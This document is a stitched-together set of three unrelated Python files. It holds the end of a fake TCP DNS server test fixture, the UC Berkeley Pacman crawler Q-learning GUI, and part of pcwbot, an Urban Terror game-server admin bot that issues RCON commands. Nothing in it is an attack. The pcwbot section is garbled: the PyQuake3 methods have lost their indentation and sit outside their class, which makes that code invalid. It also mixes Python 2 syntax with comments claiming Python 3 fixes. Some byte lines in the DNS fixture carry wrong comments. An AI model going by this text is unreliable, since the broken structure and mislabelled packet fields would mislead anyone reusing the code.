            length = data[ini]
            while length != 0:
                domain += data[ini + 1:ini + length + 1] + b'.'
                ini += length + 1
                length = data[ini]
        return domain

    def answer(data, domain):
        # Hand-built DNS response; see RFC 1035 section 4 for the layout.
        domain_length = len(domain)
        packet = b''
        if domain:
            # If an ip was given we return it in the answer
            if ip_to_give:
                packet += data[2:4] + b'\x81\x80'
                packet += data[6:8] + data[6:8] + b'\x00\x00\x00\x00'  # Questions and answers counts
                packet += data[14: 14 + domain_length + 1]  # Original domain name question
                packet += b'\x00\x01\x00\x01'  # Type and class
                packet += b'\xc0\x0c\x00\x01'  # TTL
                packet += b'\x00\x01'
                packet += b'\x00\x00\x00\x08'
                packet += b'\x00\x04'  # Resource data length -> 4 bytes
                packet += bytearray(int(x) for x in ip_to_give.split("."))
            else:
                packet += data[2:4] + b'\x85\x80'
                packet += data[6:8] + b'\x00\x00' + b'\x00\x00\x00\x00'  # Questions and answers counts
                packet += data[14: 14 + domain_length + 1]  # Original domain name question
                packet += b'\x00\x01\x00\x01'  # Type and class
        # TCP DNS messages carry a two-byte big-endian length prefix.
        sz = struct.pack('>H', len(packet))
        return sz + packet

    def serve(server_socket):  # thread target
        # NOTE(review): a single accept() per invocation -- request_count
        # only caps *answered* requests, it does not allow more clients.
        client_sock, address = server_socket.accept()
        state[0] += 1
        if state[0] <= request_count:
            data = bytearray(client_sock.recv(1024))
            if data == death_pill:
                client_sock.close()
                return
            domain = extract_domain(data)
            client_sock.sendall(answer(data, domain))
        client_sock.close()

    # Server starts
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server_socket.bind((host, 0))  # port 0: let the OS pick a free port
    server_socket.listen(5)
    server_addr = server_socket.getsockname()
    thread = Thread(target=serve, args=(server_socket, ))
    thread.start()
    yield server_addr
    # Stop the server
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.connect(server_addr)
    client.send(death_pill)
    client.close()
    thread.join()
    server_socket.close()
|
graphicsCrawlerDisplay.py | # graphicsCrawlerDisplay.py
# -------------------------
# Licensing Information: You are free to use or extend these projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.
#
# Attribution Information: The Pacman AI projects were developed at UC Berkeley.
# The core projects and autograders were primarily created by John DeNero
# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).
# Student side autograding was added by Brad Miller, Nick Hay, and
# Pieter Abbeel (pabbeel@cs.berkeley.edu).
# graphicsCrawlerDisplay.py
# -------------------------
# Licensing Information: Please do not distribute or publish solutions to this
# project. You are free to use and extend these projects for educational
# purposes. The Pacman AI projects were developed at UC Berkeley, primarily by
# John DeNero (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).
# Student side autograding was added by Brad Miller, Nick Hay, and Pieter
# Abbeel in Spring 2013.
# For more info, see http://inst.eecs.berkeley.edu/~cs188/pacman/pacman.html
import tkinter
import qlearningAgents
import time
import threading
import sys
import crawler
# import pendulum
import math
from math import pi as PI
# Which robot to simulate: 'crawler' (default) or 'pendulum'
# (the pendulum import above is commented out, so only 'crawler' works here).
robotType = 'crawler'
class Application:
    """Tk GUI wrapper around the crawler reinforcement-learning demo.

    Builds speed/epsilon/discount/learning-rate controls, creates the
    robot environment and Q-learning agent, and drives the learning loop
    on a background thread.
    """

    def sigmoid(self, x):
        # Squash the unbounded +/- button counters into (0, 1).
        # Uses base 2 rather than e so each click moves in handy steps.
        return 1.0 / (1.0 + 2.0 ** (-x))

    def incrementSpeed(self, inc):
        """Multiply the per-step delay by *inc* and refresh the label."""
        self.tickTime *= inc
        # self.epsilon = min(1.0, self.epsilon)
        # self.epsilon = max(0.0,self.epsilon)
        # self.learner.setSpeed(self.epsilon)
        self.speed_label['text'] = 'Step Delay: %.5f' % (self.tickTime)

    def incrementEpsilon(self, inc):
        """Shift the epsilon counter, push the new value to the learner."""
        self.ep += inc
        self.epsilon = self.sigmoid(self.ep)
        self.learner.setEpsilon(self.epsilon)
        self.epsilon_label['text'] = 'Epsilon: %.3f' % (self.epsilon)

    def incrementGamma(self, inc):
        """Shift the discount counter, push the new value to the learner."""
        self.ga += inc
        self.gamma = self.sigmoid(self.ga)
        self.learner.setDiscount(self.gamma)
        self.gamma_label['text'] = 'Discount: %.3f' % (self.gamma)

    def incrementAlpha(self, inc):
        """Shift the learning-rate counter, push the new value to the learner."""
        self.al += inc
        self.alpha = self.sigmoid(self.al)
        self.learner.setLearningRate(self.alpha)
        self.alpha_label['text'] = 'Learning Rate: %.3f' % (self.alpha)

    def __initGUI(self, win):
        """Build all widgets inside *win*."""
        ## Window ##
        self.win = win
        ## Initialize Frame ##
        win.grid()
        self.dec = -.5
        self.inc = .5
        self.tickTime = 0.1
        ## Epsilon Button + Label ##
        self.setupSpeedButtonAndLabel(win)
        self.setupEpsilonButtonAndLabel(win)
        ## Gamma Button + Label ##
        self.setUpGammaButtonAndLabel(win)
        ## Alpha Button + Label ##
        self.setupAlphaButtonAndLabel(win)
        ## Exit Button ##
        # self.exit_button = tkinter.Button(win,text='Quit', command=self.exit)
        #self.exit_button.grid(row=0, column=9)
        ## Simulation Buttons ##
        # self.setupSimulationButtons(win)
        ## Canvas ##
        # BUG FIX: the canvas was created on the global `root` instead of
        # the `win` argument every other widget uses (identical at runtime
        # here, but wrong if a different parent window were ever passed).
        self.canvas = tkinter.Canvas(win, height=200, width=1000)
        self.canvas.grid(row=2, columnspan=10)

    def setupAlphaButtonAndLabel(self, win):
        """Create the learning-rate -/+ buttons and their label."""
        self.alpha_minus = tkinter.Button(win,
            text="-", command=(lambda: self.incrementAlpha(self.dec)))
        self.alpha_minus.grid(row=1, column=3, padx=10)
        self.alpha = self.sigmoid(self.al)
        self.alpha_label = tkinter.Label(win, text='Learning Rate: %.3f' % (self.alpha))
        self.alpha_label.grid(row=1, column=4)
        self.alpha_plus = tkinter.Button(win,
            text="+", command=(lambda: self.incrementAlpha(self.inc)))
        self.alpha_plus.grid(row=1, column=5, padx=10)

    def setUpGammaButtonAndLabel(self, win):
        """Create the discount -/+ buttons and their label."""
        self.gamma_minus = tkinter.Button(win,
            text="-", command=(lambda: self.incrementGamma(self.dec)))
        self.gamma_minus.grid(row=1, column=0, padx=10)
        self.gamma = self.sigmoid(self.ga)
        self.gamma_label = tkinter.Label(win, text='Discount: %.3f' % (self.gamma))
        self.gamma_label.grid(row=1, column=1)
        self.gamma_plus = tkinter.Button(win,
            text="+", command=(lambda: self.incrementGamma(self.inc)))
        self.gamma_plus.grid(row=1, column=2, padx=10)

    def setupEpsilonButtonAndLabel(self, win):
        """Create the epsilon -/+ buttons and their label."""
        self.epsilon_minus = tkinter.Button(win,
            text="-", command=(lambda: self.incrementEpsilon(self.dec)))
        self.epsilon_minus.grid(row=0, column=3)
        self.epsilon = self.sigmoid(self.ep)
        self.epsilon_label = tkinter.Label(win, text='Epsilon: %.3f' % (self.epsilon))
        self.epsilon_label.grid(row=0, column=4)
        self.epsilon_plus = tkinter.Button(win,
            text="+", command=(lambda: self.incrementEpsilon(self.inc)))
        self.epsilon_plus.grid(row=0, column=5)

    def setupSpeedButtonAndLabel(self, win):
        """Create the step-delay -/+ buttons and their label."""
        self.speed_minus = tkinter.Button(win,
            text="-", command=(lambda: self.incrementSpeed(.5)))
        self.speed_minus.grid(row=0, column=0)
        self.speed_label = tkinter.Label(win, text='Step Delay: %.5f' % (self.tickTime))
        self.speed_label.grid(row=0, column=1)
        self.speed_plus = tkinter.Button(win,
            text="+", command=(lambda: self.incrementSpeed(2)))
        self.speed_plus.grid(row=0, column=2)

    def skip5kSteps(self):
        """Request 5000 fast-forwarded learning steps."""
        self.stepsToSkip = 5000

    def __init__(self, win):
        self.ep = 0
        self.ga = 2
        self.al = 2
        self.stepCount = 0
        ## Init Gui
        self.__initGUI(win)
        # Init environment
        if robotType == 'crawler':
            self.robot = crawler.CrawlingRobot(self.canvas)
            self.robotEnvironment = crawler.CrawlingRobotEnvironment(self.robot)
        elif robotType == 'pendulum':
            self.robot = pendulum.PendulumRobot(self.canvas)
            self.robotEnvironment = \
                pendulum.PendulumRobotEnvironment(self.robot)
        else:
            raise Exception("Unknown RobotType")
        # Init Agent.  (Removed the unused `simulationFn` lambda: it
        # referenced a `simulation` module that is never imported.)
        actionFn = lambda state: \
            self.robotEnvironment.getPossibleActions(state)
        self.learner = qlearningAgents.QLearningAgent(actionFn=actionFn)
        self.learner.setEpsilon(self.epsilon)
        self.learner.setLearningRate(self.alpha)
        self.learner.setDiscount(self.gamma)
        # Start GUI: the learning loop runs off the Tk thread.
        self.running = True
        self.stopped = False
        self.stepsToSkip = 0
        self.thread = threading.Thread(target=self.run)
        self.thread.start()

    def exit(self):
        """Stop the worker thread, destroy the window and exit the process."""
        self.running = False
        for i in range(5):
            # Give the worker up to ~0.5s to notice and stop.
            if not self.stopped:
                time.sleep(0.1)
        try:
            self.win.destroy()
        except:
            pass
        sys.exit(0)

    def step(self):
        """Advance the simulation by one learning transition."""
        self.stepCount += 1
        state = self.robotEnvironment.getCurrentState()
        actions = self.robotEnvironment.getPossibleActions(state)
        if len(actions) == 0:  # fixed: was compared against the float 0.0
            self.robotEnvironment.reset()
            state = self.robotEnvironment.getCurrentState()
            actions = self.robotEnvironment.getPossibleActions(state)
            print('Reset!')
        action = self.learner.getAction(state)
        if action is None:  # fixed: identity check instead of == None
            raise Exception('None action returned: Code Not Complete')
        nextState, reward = self.robotEnvironment.doAction(action)
        self.learner.observeTransition(state, action, nextState, reward)

    def animatePolicy(self):
        """Paint the greedy policy over the (angle, velocity) grid
        (pendulum robot only)."""
        if robotType != 'pendulum':
            raise Exception('Only pendulum can animatePolicy')
        totWidth = self.canvas.winfo_reqwidth()
        totHeight = self.canvas.winfo_reqheight()
        length = 0.48 * min(totWidth, totHeight)
        x, y = totWidth - length - 30, length + 10
        angleMin, angleMax = self.robot.getMinAndMaxAngle()
        velMin, velMax = self.robot.getMinAndMaxAngleVelocity()
        if not 'animatePolicyBox' in dir(self):
            # Draw the bounding box and legend only once.
            self.canvas.create_line(x, y, x + length, y)
            self.canvas.create_line(x + length, y, x + length, y - length)
            self.canvas.create_line(x + length, y - length, x, y - length)
            self.canvas.create_line(x, y - length, x, y)
            self.animatePolicyBox = 1
            self.canvas.create_text(x + length / 2, y + 10, text='angle')
            self.canvas.create_text(x - 30, y - length / 2, text='velocity')
            self.canvas.create_text(x - 60, y - length / 4, text='Blue = kickLeft')
            self.canvas.create_text(x - 60, y - length / 4 + 20, text='Red = kickRight')
            self.canvas.create_text(x - 60, y - length / 4 + 40, text='White = doNothing')
        angleDelta = (angleMax - angleMin) / 100
        velDelta = (velMax - velMin) / 100
        for i in range(100):
            angle = angleMin + i * angleDelta
            for j in range(100):
                vel = velMin + j * velDelta
                state = self.robotEnvironment.getState(angle, vel)
                # Renamed from max/argMax to avoid shadowing builtins.
                bestQ, bestAction = None, None
                if not self.learner.seenState(state):
                    bestAction = 'unseen'
                else:
                    for action in ('kickLeft', 'kickRight', 'doNothing'):
                        qVal = self.learner.getQValue(state, action)
                        if bestQ is None or qVal > bestQ:
                            bestQ, bestAction = qVal, action
                if bestAction != 'unseen':
                    if bestAction == 'kickLeft':
                        color = 'blue'
                    elif bestAction == 'kickRight':
                        color = 'red'
                    elif bestAction == 'doNothing':
                        color = 'white'
                    dx = length / 100.0
                    dy = length / 100.0
                    x0, y0 = x + i * dx, y - j * dy
                    self.canvas.create_rectangle(x0, y0, x0 + dx, y0 + dy, fill=color)

    def run(self):
        """Background thread body: sleep, then take learning steps."""
        self.stepCount = 0
        self.learner.startEpisode()
        while True:
            minSleep = .01
            tm = max(minSleep, self.tickTime)
            time.sleep(tm)
            # Fast-forward extra steps when the delay is shorter than the
            # minimum sleep granularity.
            self.stepsToSkip = int(tm / self.tickTime) - 1
            if not self.running:
                self.stopped = True
                return
            for i in range(self.stepsToSkip):
                self.step()
            self.stepsToSkip = 0
            self.step()
            # self.robot.draw()
        # NOTE(review): unreachable -- the loop above only exits via return.
        self.learner.stopEpisode()

    def start(self):
        """Enter the Tk main loop (blocks until the window closes)."""
        self.win.mainloop()
def run():
    """Build the Tk root window, start the Application and drive redraws."""
    global root
    root = tkinter.Tk()
    root.title('Crawler GUI')
    root.resizable(0, 0)
    # root.mainloop()
    app = Application(root)

    def update_gui():
        # Redraw the robot and reschedule ourselves on the Tk event loop.
        app.robot.draw(app.stepCount, app.tickTime)
        root.after(10, update_gui)

    update_gui()
    root.protocol('WM_DELETE_WINDOW', app.exit)
    try:
        app.start()
    except:
        # NOTE(review): bare except also swallows KeyboardInterrupt so the
        # GUI always shuts down through app.exit().
        app.exit()
|
pcwbot.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
pcwbot - An automated game server bot
http://www.spunkybot.de/pcwbot
Author: Alexander Kress
This program is released under the MIT License. See LICENSE for more details.
## About ##
pcwbot is a scaled-down version of Spunky Bot, the lightweight game server
administration bot and RCON tool, which is optimized for private war servers.
## Configuration ##
Modify the UrT server config as follows:
* seta g_logsync "1"
Modify the configuration file 'settings.conf'
Run the bot: python pcwbot.py
"""
__version__ = '0.9.10'
### IMPORTS
import re
import time
import sqlite3
import textwrap
import ConfigParser
import socket
from Queue import Queue
from threading import Thread
from threading import RLock
class Q3Player(object):
    """
    Q3Player class: a single player entry parsed from a Quake 3 server
    status response.
    """

    def __init__(self, num, name, frags, ping, address=None, bot=-1):
        """
        create a new instance of Q3Player
        """
        self.num = num  # client number (parse_players always passes 1)
        self.name = name  # player name as reported by the server
        self.frags = frags  # frag count (string, straight from the regex)
        self.ping = ping  # ping (string, straight from the regex)
        self.address = address  # "ip:port" if known, else None
        self.bot = bot  # presumably a bot skill level, -1 = human -- unverified
class PyQuake3(object):
    """
    PyQuake3 class - Python Quake 3 Library
    http://misc.slowchop.com/misc/wiki/pyquake3
    Copyright (C) 2006-2007 Gerald Kaszuba
    """
    # Every out-of-band Quake 3 packet starts with four 0xff bytes.
    packet_prefix = '\xff' * 4
    # Matches one '<frags> <ping> "<name>"' line of a getstatus response.
    player_reo = re.compile(r'^(\d+) (\d+) "(.*)"')
    rcon_password = None
    port = None
    address = None
    players = None  # list of Q3Player, filled by parse_players()
    values = None  # dict of server cvars, filled by update()
def __init__(self, server, rcon_password=''):
    """
    create a new instance of PyQuake3

    *server* is an "address:port" string; a UDP socket is connected
    to it immediately.
    """
    self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    self.set_server(server)
    self.set_rcon_password(rcon_password)
def set_server(self, server):
    """
    set IP address and port and connect to socket

    *server* must look like "address:port"; raises ValueError otherwise.
    """
    try:
        self.address, self.port = server.split(':')
    except ValueError:
        # Was a bare "except:", which also hid unrelated errors such as
        # KeyboardInterrupt or AttributeError on a non-string argument.
        raise ValueError('Server address format must be: "address:port"')
    self.port = int(self.port)
    self.sock.connect((self.address, self.port))
def get_address(self):
    """
    get IP address and port as a single "address:port" string
    """
    return '{0}:{1}'.format(self.address, self.port)
def set_rcon_password(self, rcon_password):
    """
    set RCON password used by rcon() commands
    """
    self.rcon_password = rcon_password
def send_packet(self, data):
    """
    send packet, prefixed with the four 0xff out-of-band marker bytes
    """
    self.sock.send('%s%s\n' % (self.packet_prefix, data))
def recv(self, timeout=1):
    """
    receive packets

    Waits up to *timeout* seconds; raises Exception on socket errors.
    """
    self.sock.settimeout(timeout)
    try:
        return self.sock.recv(8192)
    except socket.error as err:
        # Fixed the Python-2-only "except socket.error, err" syntax;
        # "as err" works on Python 2.6+ and 3.
        # NOTE(review): err[1] relies on Python 2 exception indexing --
        # use err.args/str(err) if this file ever moves to Python 3.
        raise Exception('Error receiving the packet: %s' % err[1])
def command(self, cmd, timeout=1, retries=5):
"""
send command and receive response
"""
while retries:
self.send_packet(cmd)
try:
data = self.recv(timeout)
except Exception:
data = None
if data:
return self.parse_packet(data)
retries -= 1
raise Exception('Server response timed out')
def rcon(self, cmd):
"""
send RCON command
"""
r_cmd = self.command('rcon "%s" %s' % (self.rcon_password, cmd))
if r_cmd[1] == 'No rconpassword set on the server.\n' or r_cmd[1] == 'Bad rconpassword.\n':
raise Exception(r_cmd[1][:-1])
return r_cmd
def parse_packet(self, data):
"""
parse the received packet
"""
if data.find(self.packet_prefix) != 0:
raise Exception('Malformed packet')
first_line_length = data.find('\n')
if first_line_length == -1:
raise Exception('Malformed packet')
response_type = data[len(self.packet_prefix):first_line_length]
response_data = data[first_line_length + 1:]
return response_type, response_data
def parse_status(self, data):
"""
parse the response message and return a list
"""
split = data[1:].split('\\')
values = dict(zip(split[::2], split[1::2]))
# if there are \n's in one of the values, it's the list of players
for var, val in values.items():
pos = val.find('\n')
if pos == -1:
continue
split = val.split('\n', 1)
values[var] = split[0]
self.parse_players(split[1])
return values
def parse_players(self, data):
"""
parse player information - name, frags and ping
"""
self.players = []
for player in data.split('\n'):
if not player:
continue
match = self.player_reo.match(player)
if not match:
print 'couldnt match', player
continue
frags, ping, name = match.groups()
self.players.append(Q3Player(1, name, frags, ping))
def update(self):
"""
get status
"""
data = self.command('getstatus')[1]
self.values = self.parse_status(data)
def rcon_update(self):
"""
perform RCON status update
"""
data = self.rcon('status')[1]
lines = data.split('\n')
players = lines[3:]
self.players = []
for ply in players:
while ply.find(' ') != -1:
ply = ply.replace(' ', ' ')
while ply.find(' ') == 0:
ply = ply[1:]
if ply == '':
continue
ply = ply.split(' ')
try:
self.players.append(Q3Player(int(ply[0]), ply[3], int(ply[1]), int(ply[2]), ply[5]))
except (IndexError, ValueError):
continue
### CLASS Rcon ###
class Rcon(object):
    """
    RCON class, version 1.0.7

    Serializes RCON commands through a queue drained by a daemon thread,
    so callers never block on the UDP round-trip.
    """
    def __init__(self, host, port, passwd):
        """
        create a new instance of Rcon
        @param host: The server IP address
        @type host: String
        @param port: The server port
        @type port: String
        @param passwd: The RCON password
        @type passwd: String
        """
        self.live = False
        self.quake = PyQuake3("%s:%s" % (host, port), passwd)
        self.queue = Queue()
        self.rcon_lock = RLock()
        # start Thread (daemon: dies with the main thread)
        self.processor = Thread(target=self.process)
        self.processor.setDaemon(True)
        self.processor.start()
    def push(self, msg):
        """
        queue an RCON command for the worker thread; no-op until go_live()
        @param msg: The RCON command
        @type msg: String
        """
        if self.live:
            with self.rcon_lock:
                self.queue.put(msg)
    def go_live(self):
        """
        go live: allow commands to be queued and executed
        """
        self.live = True
    def get_rcon_output(self, value):
        """
        execute an RCON command synchronously and return its output;
        returns None while not live
        """
        if self.live:
            with self.rcon_lock:
                return self.quake.rcon(value)
    def process(self):
        """
        Thread process: drain the queue, polling roughly 3 times per second
        """
        while 1:
            if not self.queue.empty():
                if self.live:
                    with self.rcon_lock:
                        try:
                            command = self.queue.get()
                            if command != 'status':
                                self.quake.rcon(command)
                            else:
                                # 'status' refreshes the player list instead of
                                # sending a plain command
                                self.quake.rcon_update()
                        except Exception:
                            # best-effort: a failed command is silently dropped
                            pass
            time.sleep(.33)
### CLASS Log Parser ###
class LogParser(object):
    """
    log file parser

    Tails the UrT games log, parses each line and dispatches chat commands
    (!kick, !map, ...) according to the issuing player's admin role.
    """
    def __init__(self, config_file):
        """
        create a new instance of LogParser
        @param config_file: The full path of the bot configuration file
        @type config_file: String
        """
        # RCON commands for the different admin roles
        self.admin_cmds = ['cyclemap', 'exec', 'force', 'kick', 'list', 'map', 'password', 'reload', 'setnextmap', 'swapteams', 'veto']
        self.headadmin_cmds = self.admin_cmds + ['leveltest', 'putgroup', 'ungroup']
        # alphabetic sort of the commands
        self.admin_cmds.sort()
        self.headadmin_cmds.sort()
        self.config_file = config_file
        config = ConfigParser.ConfigParser()
        config.read(config_file)
        print "- Imported config file '%s' successful." % config_file
        games_log = config.get('server', 'log_file')
        # open game log file
        self.log_file = open(games_log, 'r')
        # go to the end of the file
        self.log_file.seek(0, 2)
        print "- Parsing games log file '%s' successful." % games_log
        self.game = None
        self.players_lock = RLock()
        # enable/disable option to get Head Admin by checking existence of head admin in database
        curs.execute("SELECT COUNT(*) FROM `admins` WHERE `admin_role` = 100")
        self.iamgod = True if curs.fetchone()[0] < 1 else False
        # start parsing the games logfile (read_log loops forever)
        self.read_log()
    def read_log(self):
        """
        read the logfile, 'tail -f' style; never returns
        """
        # create instance of Game
        self.game = Game(self.config_file)
        while self.log_file:
            line = self.log_file.readline()
            if line:
                self.parse_line(line)
            else:
                # reached end of file: the bot can go live, then poll for new lines
                if not self.game.live:
                    self.game.go_live()
                time.sleep(.125)
    def parse_line(self, string):
        """
        parse the logfile and search for specific action
        """
        # strip the leading timestamp (first 7 characters of each log line)
        line = string[7:]
        tmp = line.split(":", 1)
        line = tmp[1].strip() if len(tmp) > 1 else tmp[0].strip()
        try:
            action = tmp[0].strip()
            if action == 'ClientUserinfo':
                self.handle_userinfo(line)
            elif action == 'ClientDisconnect':
                self.handle_disconnect(line)
            elif action == 'say':
                self.handle_say(line)
        except (IndexError, KeyError):
            # malformed line or unknown player number: ignore
            pass
        except Exception, err:
            print "%s: %s" % (err.__class__.__name__, err)
    def explode_line(self, line):
        """
        explode a backslash-separated '\\key\\value\\...' line into a dict
        """
        arr = line.lstrip().lstrip('\\').split('\\')
        key = True
        key_val = None
        values = {}
        for item in arr:
            # items alternate between keys and values
            if key:
                key_val = item
                key = False
            else:
                values[key_val.rstrip()] = item.rstrip()
                key_val = None
                key = True
        return values
    def handle_userinfo(self, line):
        """
        handle player user information, auto-kick known cheater ports or guids
        """
        with self.players_lock:
            player_num = int(line[:2].strip())
            line = line[2:].lstrip("\\").lstrip()
            values = self.explode_line(line)
            # fall back to defaults for missing userinfo fields
            name = re.sub(r"\s+", "", values['name']) if 'name' in values else "UnnamedPlayer"
            ip_port = values['ip'] if 'ip' in values else "0.0.0.0:0"
            guid = values['cl_guid'] if 'cl_guid' in values else "None"
            ip_address = ip_port.split(":")[0].strip()
            if player_num not in self.game.players:
                player = Player(player_num, ip_address, guid, name)
                self.game.add_player(player)
            # keep guid and name in sync on reconnect or rename
            if self.game.players[player_num].get_guid() != guid:
                self.game.players[player_num].set_guid(guid)
            if self.game.players[player_num].get_name() != name:
                self.game.players[player_num].set_name(name)
    def handle_disconnect(self, line):
        """
        handle player disconnect
        """
        with self.players_lock:
            player_num = int(line)
            # a KeyError for an unknown slot is swallowed by parse_line
            del self.game.players[player_num]
    def player_found(self, user):
        """
        return True and instance of player or False and message text
        """
        victim = None
        name_list = []
        append = name_list.append
        for player in self.game.players.itervalues():
            player_name = player.get_name()
            player_num = player.get_player_num()
            # exact name or slot-number match wins immediately; 1022 is the bot itself
            if (user.upper() == player_name.upper() or user == str(player_num)) and player_num != 1022:
                victim = player
                name_list = ["^3%s [^2%d^3]" % (player_name, player_num)]
                break
            elif user.upper() in player_name.upper() and player_num != 1022:
                # substring match: collect all candidates
                victim = player
                append("^3%s [^2%d^3]" % (player_name, player_num))
        if len(name_list) == 0:
            return False, None, "^3No Player found"
        elif len(name_list) > 1:
            return False, None, "^7Players matching %s: ^3%s" % (user, ', '.join(name_list))
        else:
            return True, victim, None
    def map_found(self, map_name):
        """
        return True and map name or False and message text
        """
        map_list = []
        append = map_list.append
        for maps in self.game.get_all_maps():
            # exact match (with or without the 'ut4_' prefix) wins immediately
            if map_name.lower() == maps or ('ut4_%s' % map_name.lower()) == maps:
                append(maps)
                break
            elif map_name.lower() in maps:
                append(maps)
        if not map_list:
            return False, None, "^3Map not found"
        elif len(map_list) > 1:
            return False, None, "^7Maps matching %s: ^3%s" % (map_name, ', '.join(map_list))
        else:
            return True, map_list[0], None
    def handle_say(self, line):
        """
        handle say commands
        """
        with self.players_lock:
            line = line.strip()
            try:
                # chat line format: '<num> <name>: <text>'
                divider = line.split(": ", 1)
                number = divider[0].split(" ", 1)[0]
                cmd = divider[1].split()[0]
                sar = {'player_num': int(number), 'command': cmd}
            except IndexError:
                # not a chat command; attribute it to the bot slot with no command
                sar = {'player_num': 1022, 'command': ''}
            if sar['command'] == '!help' or sar['command'] == '!h':
                # NOTE(review): only role exactly 40 gets the admin list and only
                # roles > 80 the head admin list; with the defined roles
                # (0/1/40/100) that covers everyone relevant, but the asymmetric
                # checks are fragile — confirm if new roles are ever added
                if self.game.players[sar['player_num']].get_admin_role() == 40:
                    self.game.rcon_tell(sar['player_num'], "^7Admin commands: ^3%s" % ", ".join(self.admin_cmds))
                elif self.game.players[sar['player_num']].get_admin_role() > 80:
                    self.game.rcon_tell(sar['player_num'], "^7Head Admin commands: ^3%s" % ", ".join(self.headadmin_cmds))
            ## admin level 40
            # force - force a player to the given team
            elif sar['command'] == '!force' and self.game.players[sar['player_num']].get_admin_role() >= 40:
                if line.split(sar['command'])[1]:
                    arg = line.split(sar['command'])[1].split()
                    if len(arg) > 1:
                        user = arg[0]
                        team = arg[1]
                        # accepted team abbreviations
                        team_dict = {'red': 'red', 'r': 'red', 're': 'red',
                        'blue': 'blue', 'b': 'blue', 'bl': 'blue', 'blu': 'blue',
                        'spec': 'spectator', 'spectator': 'spectator', 's': 'spectator', 'sp': 'spectator', 'spe': 'spectator',
                        'green': 'green'}
                        found, victim, msg = self.player_found(user)
                        if not found:
                            self.game.rcon_tell(sar['player_num'], msg)
                        else:
                            if team in team_dict:
                                victim_player_num = victim.get_player_num()
                                self.game.rcon_forceteam(victim_player_num, team_dict[team])
                            else:
                                self.game.rcon_tell(sar['player_num'], "^7Usage: !force <name> <blue/red/spec>")
                    else:
                        self.game.rcon_tell(sar['player_num'], "^7Usage: !force <name> <blue/red/spec>")
                else:
                    self.game.rcon_tell(sar['player_num'], "^7Usage: !force <name> <blue/red/spec>")
            # kick - kick a player
            elif (sar['command'] == '!kick' or sar['command'] == '!k') and self.game.players[sar['player_num']].get_admin_role() >= 40:
                if line.split(sar['command'])[1]:
                    user = line.split(sar['command'])[1].strip()
                    found, victim, msg = self.player_found(user)
                    if not found:
                        self.game.rcon_tell(sar['player_num'], msg)
                    else:
                        if sar['player_num'] != victim.get_player_num():
                            self.game.kick_player(victim.get_player_num())
                        else:
                            self.game.rcon_tell(sar['player_num'], "^7You cannot kick yourself")
                else:
                    self.game.rcon_tell(sar['player_num'], "^7Usage: !kick <name>")
            # list - list all connected players
            elif sar['command'] == '!list' and self.game.players[sar['player_num']].get_admin_role() >= 40:
                msg = "^7Current players: %s" % ", ".join(["^3%s [^2%d^3]" % (player.get_name(), player.get_player_num()) for player in self.game.players.itervalues() if player.get_player_num() != 1022])
                self.game.rcon_tell(sar['player_num'], msg)
            # veto - stop voting process
            elif sar['command'] == '!veto' and self.game.players[sar['player_num']].get_admin_role() >= 40:
                self.game.send_rcon('veto')
            # reload
            elif sar['command'] == '!reload' and self.game.players[sar['player_num']].get_admin_role() >= 40:
                self.game.send_rcon('reload')
            # password - set private server password
            elif sar['command'] == '!password' and self.game.players[sar['player_num']].get_admin_role() >= 40:
                if line.split(sar['command'])[1]:
                    arg = line.split(sar['command'])[1].strip()
                    self.game.send_rcon('g_password %s' % arg)
                    self.game.rcon_tell(sar['player_num'], "^7Password set to '%s' - Server is private" % arg)
                else:
                    # no argument: clear the password again
                    self.game.send_rcon('g_password ""')
                    self.game.rcon_tell(sar['player_num'], "^7Password removed - Server is public")
            # exec - execute config file
            elif sar['command'] == '!exec' and self.game.players[sar['player_num']].get_admin_role() >= 40:
                if line.split(sar['command'])[1]:
                    arg = line.split(sar['command'])[1].strip()
                    self.game.send_rcon('exec %s' % arg)
                else:
                    self.game.rcon_tell(sar['player_num'], "^7Usage: !exec <filename>")
            # map - load given map
            elif sar['command'] == '!map' and self.game.players[sar['player_num']].get_admin_role() >= 40:
                if line.split(sar['command'])[1]:
                    arg = line.split(sar['command'])[1].strip()
                    found, newmap, msg = self.map_found(arg)
                    if not found:
                        self.game.rcon_tell(sar['player_num'], msg)
                    else:
                        self.game.send_rcon('map %s' % newmap)
                else:
                    self.game.rcon_tell(sar['player_num'], "^7Usage: !map <ut4_name>")
            # setnextmap - set the given map as nextmap
            elif sar['command'] == '!setnextmap' and self.game.players[sar['player_num']].get_admin_role() >= 40:
                if line.split(sar['command'])[1]:
                    arg = line.split(sar['command'])[1].strip()
                    found, nextmap, msg = self.map_found(arg)
                    if not found:
                        self.game.rcon_tell(sar['player_num'], msg)
                    else:
                        self.game.send_rcon('g_nextmap %s' % nextmap)
                else:
                    self.game.rcon_tell(sar['player_num'], "^7Usage: !setnextmap <ut4_name>")
            # cyclemap - start next map in rotation
            elif sar['command'] == '!cyclemap' and self.game.players[sar['player_num']].get_admin_role() >= 40:
                self.game.send_rcon('cyclemap')
            # swapteams - swap current teams
            # NOTE(review): 'swapteams' is listed in admin_cmds (level 40 help)
            # but the handler requires role >= 80 — confirm intended level
            elif sar['command'] == '!swapteams' and self.game.players[sar['player_num']].get_admin_role() >= 80:
                self.game.send_rcon('swapteams')
            ## head admin level 100
            # leveltest
            elif (sar['command'] == '!leveltest' or sar['command'] == '!lt') and self.game.players[sar['player_num']].get_admin_role() == 100:
                if line.split(sar['command'])[1]:
                    user = line.split(sar['command'])[1].strip()
                    found, victim, msg = self.player_found(user)
                    if not found:
                        self.game.rcon_tell(sar['player_num'], msg)
                    else:
                        self.game.rcon_tell(sar['player_num'], "^3Level %s [^2%d^3]: ^7%s" % (victim.get_name(), victim.get_admin_role(), victim.roles[victim.get_admin_role()]))
                else:
                    # no argument: report the caller's own level
                    self.game.rcon_tell(sar['player_num'], "^3Level %s [^2%d^3]: ^7%s" % (self.game.players[sar['player_num']].get_name(), self.game.players[sar['player_num']].get_admin_role(), self.game.players[sar['player_num']].roles[self.game.players[sar['player_num']].get_admin_role()]))
